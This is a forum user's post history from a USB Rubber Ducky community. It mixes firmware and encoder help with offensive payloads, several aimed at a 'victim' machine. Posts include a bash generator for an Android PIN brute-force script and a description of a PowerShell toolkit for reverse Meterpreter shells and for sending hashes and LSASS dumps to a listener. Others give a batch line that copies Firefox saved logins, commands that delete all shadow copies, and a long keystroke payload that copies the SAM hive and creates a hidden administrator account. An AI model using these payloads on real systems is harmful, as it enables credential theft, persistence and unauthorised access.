shamwow
-
Posts
52 -
Joined
-
Last visited
Posts posted by shamwow
-
-
If I'm not mistaken, you have to take the microSD card out of the Ducky, and read it with an adapter on your computer. Then, put both the VID_PID_SWAPPER.exe and VIDPID.txt on the microSD card, and run the VID_PID_SWAPPER.exe. Basically what happens is the VID_PID_SWAPPER.exe pics a random VID/PID combination from the VIDPID.txt file, which is loaded with about 350 different combinations (so, no, you don't have to edit it). Once you run the exe, a VIDPID.bin file should be created on the microSD card, and that's what tells the Ducky what VID and PID to use.
Remember to run the EXE ON the microSD card, or else it won't do anything !
V3sth4cks153
thanks.
-
Thanks both :)
I had tried C_duck_v2.1 before but for some reason it's wasn't working.
Annoyingly I've had to revert back to the original firmware though, I can't "eject" the USB part of the ducky in composite mode as the HID part of the ducky is still attached to the machine, so I'm going to need a 2nd USB device connected to the victim to get the payload off of and then eject from Windows.
c_duck_v2.1.hex works for me.
-
I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Utils/VID_PID_SWAPPER_1.1
I hope this helps you !
V3sth4cks153
thanks,nowhow do i use it?
like how do i put that into the duck?
also, do i need to edit the VIDPID.txt? if so then what do i type in VIDPID.txt?
-
how do i use the VID_PID_SWAPPER in windows
and does anyone have a link to the compiled exe file?
-
use c_duck_v2.1.hex. it's multi os, has mass storage ability and is faster.
-
Hello All,
I just purchased two rubber ducky. I am new to this, but have following the youtubes and reading a lot of posts.
Well my first attempt is to create the HELLO WORLD payload, but I am stuck at flashing the device.
I am following the instructions located at : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky
My System : Windows 7 64bit
1. I already have the following MS Visual C++ 2010 Red. (x64/x86) installed
2. I installed Flip
3. I had to manually install the Atmel Driver
4. Downloaded firmware duck_v2.hex (i assume this is twin duck) from https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Images (right click > save-as > filetype (all files))
5. I ran program.bat duck_v2.hex and it FAILS as Parsing HEX file with error "Invalid HEX file syntax"
I have tried 3 other firmware images from the repo. but still same error on all of them :(
Can someone help me to what I am doing wrong? Thank you.
try downlaoding the zip file from https://github.com/midnitesnake/usb-rubber-ducky
also try puting program.bat and newfirmware.hex in to c:\program files\flip_atmel\bin and then change to that directory in cmd prompt to run program.bat
-
I have a problem the %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but the way %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default wrote that he could not find, even though I have a folder gofsocms.default. How to solve it?
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ is a batch script command. you need to include the whole line.
also, first label your duck drive to the word "ducky" for the payload to work.
-
I should have been more specific in my post. The goal is to make it automated with little to no disruption. I would want to keep any shadows that are already on the system, but automatically create/dump/delete one.
why not delete them all and create a new one and use that new one? a batch file can delete them all then run vssown. you can use twin duck firmware as mass storage device too. i use the mimikatz payload to run an exe file that is on the ducky.
Here are some options..vssadmin Delete Shadows /For=VolumeSpec [/Oldest] [/Quiet]vssadmin Delete Shadows /Shadow=ShadowID [/Quiet]vssadmin Delete Shadows /All /quiet
Example Usage: vssadmin Delete Shadows /For=C: /Oldest /quiet
if you still want to delete a specific shadowcopy then use this one
vssadmin Delete Shadows /Shadow=ShadowID [/Quiet]
-
make a batch file and add this:
vssadmin Delete Shadows /All /quiet
-
DEFAULT_DELAY 75
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER -
I recieved my first Rubber Ducky on friday and have enjoyed playing with and I am dreaming big with the abilities this thing has! I just have one problem, my payloads don't run automatically. They will run if I press the button but thats the only way. I put a delay in at the beginning of the code like suggested in the FAQs but that was not the problem. Any help would be very appreciated!
Firmware: Composite_Duck_S003.hex
Code:
REM Prints: Hello World! DELAY 5000 STRING Test DELAY 5000 STRING Hello Word
If you have any questions about the setup please let me know and I will answer them!
try c_duck_v2.1.hex and if you are printing hello world then where are you trying to print it? in cmd prompt or in notepad? maybe add one of them to that ducky script.
-
thanks for your kind words Oli. Everything you say makes me smile! :)
The project will cost 240 euros.
You will get constant running updates and every single piece of documentation. You may also get beta versions before you get the final v1!
I will try to deliver in 1 week from the time i get the rubber ducky! 2 weeks though to give me some cushion if code doesn't run the way i want it!
As soon as the crowd fund goal is met no more people will be able to join this project.
Edit: If you all can give me a show of hands who wants in it would be great. You obviously do not pay if the goal has not been met.
I'm in.
-
Isn't it the composite duck stuff in the link you originally posted?
https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Source
which version of composite duck is c_duck_v2.1.hex ? is comosite duck-multi the multi os version(c_duck_v2.1.hex)source or the multi payload version of the source?
it would be good too if someone could link me directly to the source i need instead of just posting the same link i just posted.
-
nice idea, i will do it. i will fund 50 euros.
-
I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
will this script work against windows 10 pins as it is?
-
This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability
Power Shell Scripts for the Hak5 Ducky
1) Fast Meterpreter2) Reverse Meterpreter3) Dump Domain and Local Hashes4) Dump Lsass Process5) Dump Wifi Passwords6) Wget Execute99) ExitAll payloads are written in powershell so nothing should be caught by AV
https://github.com/b00stfr3ak/power-ducky
Fast Meterpreter
Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine.
Reverse MeterpreterCreates a reverse meterpreter shell through powershell injectionDump Domain and Local HashesMakes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.Dump Lsass ProcessDumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.Dump Wifi PasswordsDumps all available wifi profiles, and then dumps each file through a tcp socketWget ExecuteDownloads a file and executes it on the victim's machinehow do i set this up to work in the ducky?
-
I'm trying to get my usb ducky to save the sam file to the flash drive as well as create a new admin user. I'm not really sure where I am going wrong here but if anyone has advice or a code that works it would be greatly appreciated!!!
DELAY 5000GUI rDELAY 750STRING powershell Start-Process notepad -Verb runAsENTERDELAY 750ENTERALT SPACEDELAY 750STRING mDELAY 750DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTERSTRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTimeENTERSTRING $fileSaveDir = New-Item ($userDir) -ItemType DirectoryENTERSTRING $date = get-dateENTERSTRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"ENTERSTRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'ENTERSTRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"ENTERSTRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')ENTERSTRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }ENTERSTRING $addSlash = $shadow.DeviceObject + ''ENTERSTRING cmd /c mklink C:\shadowcopy $addSlashENTERSTRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDirENTERSTRING Remove-Item -recurse -force 'C:\shadowcopy'ENTERSTRING Net User Admin tacos /ADDENTERSTRING Net LocalGroup Administrators Admin /ADDENTERDELAY 500STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v Admin /t REG_DWORD /d 0 /fENTERSTRING $Report >> $fileSaveDir'/ComputerInfo.html'ENTERSTRING function copy-ToZip($fileSaveDir){ENTERSTRING $srcdir = $fileSaveDirENTERSTRING $zipFile = 'C:\Windows\Report.zip'ENTERSTRING if(-not (test-path($zipFile))) {ENTERSTRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))ENTERSTRING (dir $zipFile).IsReadOnly = $false}ENTERSTRING $shellApplication = new-object -com shell.applicationENTERSTRING $zipPackage = $shellApplication.NameSpace($zipFile)ENTERSTRING $files = Get-ChildItem -Path $srcdirENTERSTRING foreach($file in $files) {ENTERSTRING $zipPackage.CopyHere($file.FullName)ENTERSTRING while($zipPackage.Items().Item($file.name) -eq $null){ENTERSTRING Start-sleep -seconds 1 }}}ENTERSTRING copy-ToZip($fileSaveDir)ENTERSTRING $usbPresent = 'False'ENTERSTRING do {ENTERSTRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | MeasureENTERSTRING if ($present.Count -ge 1){ENTERSTRING $usbPresent = 'True' }Else {ENTERSTRING $usbPresent = 'False'}}ENTERSTRING until ($usbPresent -eq 'True')ENTERSTRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | select NameENTERSTRING move-item c:\Windows\Report.zip $driveLetter.NameENTERSTRING remove-item $fileSaveDir -recurseENTERSTRING Remove-Item $MyINvocation.InvocationNameENTERCTRL SDELAY 1500STRING C:\Windows\config-d04a8.ps1ENTERDELAY 750ALT F4DELAY 1500GUI rDELAY 750STRING powershell Start-Process cmd -Verb runAsENTERDELAY 1500STRING mode con:cols=14 lines=1ENTERALT SPACEDELAY 1500STRING mDELAY 1500DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$falseENTERDELAY 750STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1ENTERmake a batch file to start the powershell script and then have the batch file copy the files to the ducky drive.
-
I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Images
no, i'm looking for the decompiled source code for c_duck_v2.1.hex. thanks anyways.
-
where is the sourcecode to twin duck c_duck_v2.1.hex firmware?
i can't find it here. https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Source
i only see mass storage. twin duck is supposed to be multi os.
-
Just use system restore to roll back to before you did what you did to break it. Seriously repairing a computer shouldn't cost you anything if you are using duckies etc,
I just tried system restore. didn't fix it.
-
try this
quote:
Once you've got your payload in a text file, you need to use the Duck Encoder to encode it. Then you have to place the inject.bin file (the encoded file) on the root of the Duck's Micro SD card. You can encode the file directly on your computer using the encoder.jar located here: https://github.com/midnitesnake/USB-Rubber-Ducky , or you use the online encoder: http://www.ducktoolkit.com/Encoder.jsp
I hope this helps ! -
that is not how to get chrome passwords. you should test your commands in command prompt or make a batch file before attempting to make a ducky script out of them.
-
If the ducky works in other machines, then it is something up with the system you are using. It could be a ton of things. Try a different USB Port. If that doesn't work, I am out of ideas.
you're right i broke my system somehow. new usb devices wont auto install drivers either on any of the ports. i will just take my pc in to the shop to get fixed if you don't know what else i can try. thanks for trying to help.
-
See if you can find a tool to "clean" the USB Store (old USB devices that have been plugged in) from your registry.
Then try again.
okay so i just tried what you said by using this guide to drivecleanup.exe http://www.techspot.com/community/topics/usb-drive-or-flash-problems-how-to-cleanup-and-remove-old-usb-storage-drivers.145884/
i also tried usboblivion http://www.cherubicsoft.com/en/projects/usboblivion
all drives installed new drivers but it still did not fix the issue.
change the keyboard language
in Classic USB Rubber Ducky
Posted · Edited by shamwow
you will have to speak better english than that if you want someone to help you. I don't know what you are asking.
what language do you want to change to?
use duckencoder to change the language.
for usa the command is:
java -jar encoder.jar -i script.txt -o inject.bin -l us
for canadian:
java -jar encoder.jar -i script.txt -o inject.bin -l ca
for uk:
java -jar encoder.jar -i script.txt -o inject.bin -l uk
for german, i think it might be but not sure:
java -jar encoder.jar -i script.txt -o inject.bin -l gb